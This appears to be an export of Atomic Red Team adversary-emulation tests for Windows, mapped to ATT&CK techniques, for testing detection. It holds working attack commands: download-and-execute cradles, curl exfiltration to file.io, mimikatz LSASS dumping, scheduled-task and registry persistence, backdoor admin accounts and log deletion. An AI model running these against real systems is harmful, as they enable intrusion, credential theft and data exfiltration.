Will start a packet capture and store log file as t1040.etl. https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
pktmon.exe start --etw  -f %TEMP%\t1040.etl
TIMEOUT /T 5 >nul 2>&1
pktmon.exe stop
T1040 command_prompt elevated windows Windows Internal pktmon set filter
Network Sniffing
Selects the desired ports for packet capture. https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
pktmon.exe filter add -p 445
T1047 command_prompt windows WMI Reconnaissance Users
Windows Management Instrumentation
An adversary might use WMI to list all local user accounts. When the test completes, local user account information will be displayed on the command line.
wmic useraccount get /ALL /format:csv
T1047 command_prompt windows WMI Reconnaissance Processes
Windows Management Instrumentation
An adversary might use WMI to list processes running on the compromised host. When the test completes, the running processes will be listed on the command line.
wmic process get caption,executablepath,commandline /format:csv
T1047 command_prompt windows WMI Reconnaissance Software
Windows Management Instrumentation
An adversary might use WMI to list installed software hotfixes and patches. When the test completes, there should be a list of installed patches and when they were installed.
wmic qfe get description,installedOn /format:csv
T1047 command_prompt windows WMI Reconnaissance List Remote Services
Windows Management Instrumentation
An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, service information will be displayed on the screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable.
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
T1047 command_prompt windows WMI Execute Local Process
Windows Management Instrumentation
This test uses wmic.exe to execute a process on the local host. When the test completes, a new process will be started locally. A notepad application will be started when the input is left at its default.
wmic process call create #{process_to_execute}
T1047 command_prompt windows WMI Execute Remote Process
Windows Management Instrumentation
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for the remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable.
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
T1047 command_prompt windows Create a Process using WMI Query and an Encoded Command
Windows Management Instrumentation
Solarigate persistence is achieved via backdoors deployed via various techniques, including using PowerShell with an EncodedCommand: Powershell -nop -exec bypass -EncodedCommand <encoded command>, where the -EncodedCommand, once decoded, would resemble: Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs' -ComputerName WORKSTATION. The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe. You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
T1047 command_prompt windows WMI Execute rundll32
Windows Management Instrumentation
This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
T1047 command_prompt elevated windows Application uninstall using WMIC
Windows Management Instrumentation
Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
T1048.002 command_prompt windows Exfiltrate data HTTPS using curl windows
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data over HTTPS using curl to the file-sharing site file.io.
#{curl_path} -k -F "file=@#{input_file}" https://file.io/
T1049 command_prompt windows System Network Connections Discovery
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, cmd.exe will execute netstat, net use and net sessions. net sessions requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
netstat -ano
net use
net sessions 2>nul
T1053.002 command_prompt windows At.exe Scheduled task
At
Executes cmd.exe. Note: deprecated in Windows 8+. Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
at 13:20 /interactive cmd
T1053.005 command_prompt elevated windows Scheduled Task Startup Script
Scheduled Task
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
T1053.005 command_prompt windows Scheduled task Local
Scheduled Task
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
T1053.005 command_prompt elevated windows Scheduled task Remote
Scheduled Task
Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
T1053.005 command_prompt windows Scheduled Task Executing Base64 Encoded Commands From Registry
Scheduled Task
A Base64-encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch powershell to decode and run the command from the registry daily. This is a persistence mechanism recently seen in use by Qakbot. [Additional Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
T1053.005 command_prompt elevated windows Scheduled Task ("Ghost Task") via Registry Key Manipulation
Scheduled Task
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means. This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command. For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
T1053.005 command_prompt elevated windows Scheduled Task Persistence via CompMgmt.msc
Scheduled Task
Adds persistence by abusing compmgmt.msc via a scheduled task. When the Computer Management console is opened, it will run a malicious payload (in this case, calc.exe). This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
T1053.005 command_prompt elevated windows Scheduled Task Persistence via Eventviewer.msc
Scheduled Task
Adds persistence by abusing eventviewer.msc via a scheduled task. When the eventviewer console is opened, it will run a malicious payload (in this case, calc.exe).
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
T1055 command_prompt windows Remote Process Injection in LSASS via mimikatz
Process Injection
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). Especially useful against domain controllers in Active Directory environments. It must be executed in the context of a user who is privileged on remote machine. The effect of /inject is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
T1055.004 command_prompt windows Process Injection via C#
Asynchronous Procedure Call
Process injection using C#. Reference: https://github.com/pwndizzle/c-sharp-memory-injection. Exercises five techniques: 1. Process injection, 2. ApcInjectionAnyProcess, 3. ApcInjectionNewProcess, 4. IatInjection, 5. ThreadHijack. Upon successful execution, cmd.exe will execute T1055.exe, which exercises the 5 techniques. Output will be via stdout.
"#{exe_binary}"
T1057 command_prompt windows Process Discovery - tasklist
Process Discovery
Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout.
tasklist
T1057 command_prompt windows Process Discovery - wmic process
Process Discovery
Utilize windows management instrumentation to identify processes. Upon successful execution, WMIC will execute process to list processes. Output will be via stdout.
wmic process get /format:list
T1057 command_prompt windows Discover Specific Process - tasklist
Process Discovery
Adversaries may use command line tools to discover specific processes in preparation of further attacks. Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
tasklist | findstr #{process_to_enumerate}
T1057 command_prompt windows Launch Taskmgr from cmd to View running processes
Process Discovery
An adversary may launch taskmgr.exe with the /7 switch via command prompt to view processes running on the system. [Reference](https://github.com/trellix-enterprise/ac3-threat-sightings/blob/main/sightings/Sightings_Conti_Ransomware.yml)
taskmgr.exe /7
T1059.001 command_prompt elevated windows Mimikatz
PowerShell
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
T1059.001 command_prompt windows Invoke-AppPathBypass
PowerShell
Note: Windows 10 only. Upon execution, the Windows Backup and Restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
T1059.001 command_prompt windows Powershell MsXml COM object - with prompt
PowerShell
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
T1059.001 command_prompt windows Powershell XML requests
PowerShell
Powershell xml download request. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
T1059.001 command_prompt windows Powershell invoke mshta.exe download
PowerShell
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
T1059.001 command_prompt windows PowerShell Command Execution
PowerShell
Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
powershell.exe -e  #{obfuscated_code}
T1059.003 command_prompt windows Writes text to a file and displays it.
Windows Command Shell
Writes text to a file and displays the results. This test is intended to emulate the dropping of a malicious file to disk.
echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
T1059.003 command_prompt windows Suspicious Execution via Windows Command Shell
Windows Command Shell
Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
T1059.003 command_prompt windows Command Prompt read contents from CMD file and execute
Windows Command Shell
Simulate Raspberry Robin using the "standard-in" command prompt feature (cmd /R <) to read and execute a file via cmd.exe. See https://redcanary.com/blog/raspberry-robin/.
cmd /r cmd<"#{input_file}"
T1059.003 command_prompt elevated windows Command prompt writing script to file then executes it
Windows Command Shell
Simulate DarkGate malware's second stage by writing a VBScript to disk directly from the command prompt, then executing it. The script will execute 'whoami' then exit.
c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs
T1059.007 command_prompt windows JScript execution to gather local computer information via cscript
JavaScript
JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
cscript "#{jscript}" > %tmp%\T1059.007.out.txt
T1059.007 command_prompt windows JScript execution to gather local computer information via wscript
JavaScript
JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
wscript "#{jscript}"
T1069.001 command_prompt windows Basic Permission Groups Discovery Windows (Local)
Local Groups
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net localgroup
net localgroup "Administrators"
T1069.001 command_prompt windows Wmic Group Discovery
Local Groups
Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information about the local groups on the system will be displayed.
wmic group get name
T1069.002 command_prompt windows Basic Permission Groups Discovery Windows (Domain)
Domain Groups
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain
T1069.002 command_prompt windows Elevated group enumeration using net group (Domain)
Domain Groups
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net groups "Account Operators" /domain
net groups "Exchange Organization Management" /domain
net group "BUILTIN\Backup Operators" /domain
net group "Domain Admins" /domain
T1069.002 command_prompt windows Adfind - Query Active Directory Groups
Domain Groups
The Adfind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory groups. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args}
T1069.002 command_prompt elevated windows Active Directory Enumeration with LDIFDE
Domain Groups
Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects. The test is derived from the CISA report on Volt Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
ldifde.exe -f #{output_path}\#{output_file} -p subtree
T1070 command_prompt elevated windows Indicator Removal using FSUtil
Indicator Removal
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
fsutil usn deletejournal /D C:
T1070.004 command_prompt windows Delete a single file - Windows cmd
File Deletion
Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
del /f #{file_to_delete}
T1070.004 command_prompt windows Delete an entire folder - Windows cmd
File Deletion
Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
rmdir /s /q #{folder_to_delete}
T1070.004 command_prompt elevated windows Clears Recycle bin via rd
File Deletion
An adversary clears the recycle bin in the system partition using rd to remove traces of deleted files. [Reference](https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/)
rd /s /q %systemdrive%\$RECYCLE.BIN
T1070.005 command_prompt windows Add Network Share
Network Share Connection Removal
Add a Network Share utilizing the command_prompt
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
T1070.005 command_prompt windows Remove Network Share
Network Share Connection Removal
Removes a Network Share utilizing the command_prompt
net share #{share_name} /delete
T1070.005 command_prompt elevated windows Disable Administrative Share Creation at Startup
Network Share Connection Removal
Administrative shares are hidden network shares created by Microsoft's Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. These shares are automatically created at startup unless they have been purposefully disabled, as is done in this Atomic test. As Microsoft puts it, "Missing administrative shares typically indicate that the computer in question has been compromised by malicious software." https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
T1070.005 command_prompt elevated windows Remove Administrative Shares
Network Share Connection Removal
Administrative shares are hidden network shares created by Microsoft's Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As Microsoft puts it, "Missing administrative shares typically indicate that the computer in question has been compromised by malicious software." https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
for %i in (C$ IPC$ ADMIN$) do net share %i /delete
T1071.001 command_prompt windows Malicious User Agents - CMD
Web Protocols
This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "*<|>*" -m3 #{domain} >nul 2>&1
T1072 command_prompt elevated windows Radmin Viewer Utility
Software Deployment Tools
An adversary may use the Radmin Viewer utility to remotely control a Windows device; this test starts the Radmin console.
"%PROGRAMFILES(x86)%/#{radmin_exe}"
T1072 command_prompt elevated windows PDQ Deploy RAT
Software Deployment Tools
An adversary may use PDQ Deploy software to deploy a Remote Administration Tool; this test starts the PDQ console.
"%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
T1078.001 command_prompt elevated windows Enable Guest account with RDP capability and admin privileges
Default Accounts
After execution, the default Guest account will be enabled (Active) and added to the Administrators and Remote Desktop Users groups, and the desktop will allow multiple RDP connections.
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
T1078.001 command_prompt elevated windows Activate Guest Account
Default Accounts
Adversaries can activate the default Guest user. The Guest account is inactive by default.
net user #{guest_user} /active:yes
T1078.003 command_prompt elevated windows Create local account with admin privileges
Local Accounts
After execution, the new account will be active and added to the Administrators group.
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
T1078.003 command_prompt elevated windows Use PsExec to elevate to NT Authority\SYSTEM account
Local Accounts
PsExec is a powerful tool most known for its remote management capability. However, it can also be used to run processes as the local system account. The local system account is a default windows account which has unrestricted access to all system resources. Upon successful execution, PsExec.exe will spawn a command prompt which will run 'whoami' as the local system account and then exit.
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami
T1082 command_prompt windows System Information Discovery
System Information Discovery
Identify System Info. Upon execution, system info and time info will be displayed.
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
T1082 command_prompt windows Hostname Discovery (Windows)
System Information Discovery
Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
hostname
T1082 command_prompt windows Windows MachineGUID Discovery
System Information Discovery
Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
T1082 command_prompt windows Environment variables discovery on windows
System Information Discovery
Identify all environment variables. Upon execution, environment variables and your path info will be displayed.
set
T1082 command_prompt windows System Information Discovery with WMIC
System Information Discovery
Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting: https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
Get-WmiObject win32_bios
T1082 command_prompt elevated windows System Information Discovery
System Information Discovery
The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
wscript.exe C:\Windows\System32\gatherNetworkInfo.vbs
T1082 command_prompt windows Check computer location
System Information Discovery
Looks up the country code configured in the registry, likely for geofencing. Upon execution, country code info will be displayed. - https://tria.ge/210111-eaz8mqhgh6/behavioral1
reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"
T1082 command_prompt windows BIOS Information Discovery through Registry
System Information Discovery
Looks up BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed. - https://tria.ge/210111-eaz8mqhgh6/behavioral1 - https://evasions.checkpoint.com/techniques/registry.html
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
T1082 command_prompt windows ESXi - VM Discovery using ESXCLI
System Information Discovery
An adversary uses ESXCLI to enumerate the virtual machines on the host prior to executing a power-off routine. [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1082 command_prompt windows ESXi - Darkside system information discovery
System Information Discovery
Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host. [Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1082 command_prompt windows Check OS version via "ver" command
System Information Discovery
The ver command shows information about the OS version.
ver
T1082 command_prompt elevated windows Display volume shadow copies with "vssadmin"
System Information Discovery
The command shows all available volume shadow copies, along with their creation time and location.
vssadmin.exe list shadows
T1082 command_prompt windows Identify System Locale and Regional Settings with PowerShell
System Information Discovery
This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.
powershell.exe -c "Get-Culture | Format-List | Out-File -FilePath %TMP%\a.txt"
T1082 command_prompt windows Enumerate Available Drives via gdr
System Information Discovery
This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.
powershell.exe -c "gdr -PSProvider 'FileSystem'"
T1082 command_prompt windows Discover OS Product Name via Registry
System Information Discovery
Identify the Operating System Product Name via registry with the reg.exe command. Upon execution, the OS Product Name will be displayed.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
T1082 command_prompt windows Discover OS Build Number via Registry
System Information Discovery
Identify the Operating System Build Number via registry with the reg.exe command. Upon execution, the OS Build Number will be displayed.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber
T1083 command_prompt windows File and Directory Discovery (cmd.exe)
File and Directory Discovery
Find or discover files on the file system. Upon successful execution, this test will output the results of all the data discovery commands to a specified file.
dir /s c:\ >> #{output_file}
dir /s "c:\Documents and Settings" >> #{output_file}
dir /s "c:\Program Files\" >> #{output_file}
dir "%systemdrive%\Users\*.*" >> #{output_file}
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> #{output_file}
dir "%userprofile%\Desktop\*.*" >> #{output_file}
tree /F >> #{output_file}
T1083 command_prompt windows ESXi - Enumerate VMDKs available on an ESXi Host
File and Directory Discovery
An adversary uses the find command to enumerate VMDKs on an ESXi host. [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1087.001 command_prompt windows Enumerate all accounts on Windows (Local)
Local Account
Enumerate all accounts. Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session.
net user
dir c:\Users\
cmdkey.exe /list
net localgroup "Users"
net localgroup
T1087.001 command_prompt windows Enumerate logged on users via CMD (Local)
Local Account
Enumerate logged on users. Upon execution, logged on users will be displayed.
query user
T1087.001 command_prompt windows ESXi - Local Account Discovery via ESXCLI
Local Account
An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system account list"
T1087.002 command_prompt windows Enumerate all accounts (Domain)
Domain Account
Enumerate all accounts. Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session.
net user /domain
net group /domain
T1087.002 command_prompt windows Enumerate logged on users via CMD (Domain)
Domain Account
Enumerate logged on users. Upon execution, logged on users will be displayed.
query user /SERVER:#{computer_name}
T1087.002 command_prompt windows Adfind -Listing password policy
Domain Account
The AdFind tool can be used for reconnaissance in an Active Directory environment. The example chosen illustrates AdFind used to query the local password policy. Reference: http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
T1087.002 command_prompt windows Adfind - Enumerate Active Directory Admins
Domain Account
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory admin accounts. Reference: http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
T1087.002 command_prompt windows Adfind - Enumerate Active Directory User Objects
Domain Account
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory user objects. Reference: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
T1087.002 command_prompt windows Adfind - Enumerate Active Directory Exchange AD Objects
Domain Account
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange objects. Reference: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
T1087.002 command_prompt windows Enumerate Default Domain Admin Details (Domain)
Domain Account
This test will enumerate the details of the built-in domain admin account.
net user administrator /domain
T1098 command_prompt elevated windows Password Change on Directory Service Restore Mode (DSRM) Account
Account Manipulation
Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing it from an existing domain account.
ntdsutil "set dsrm password" "sync from domain account #{sync_account}" "q" "q"
T1105 command_prompt windows certutil download (urlcache)
Ingress Tool Transfer
Use the certutil -urlcache argument to download a file from the web. Note: /urlcache also works.
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
T1105 command_prompt windows Windows - BITSAdmin BITS Download
Ingress Tool Transfer
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
T1105 command_prompt elevated windows OSTAP Worming Activity
Ingress Tool Transfer
OSTap copies itself in a specific way to shares and secondary drives. This test emulates that activity.
pushd #{destination_path}
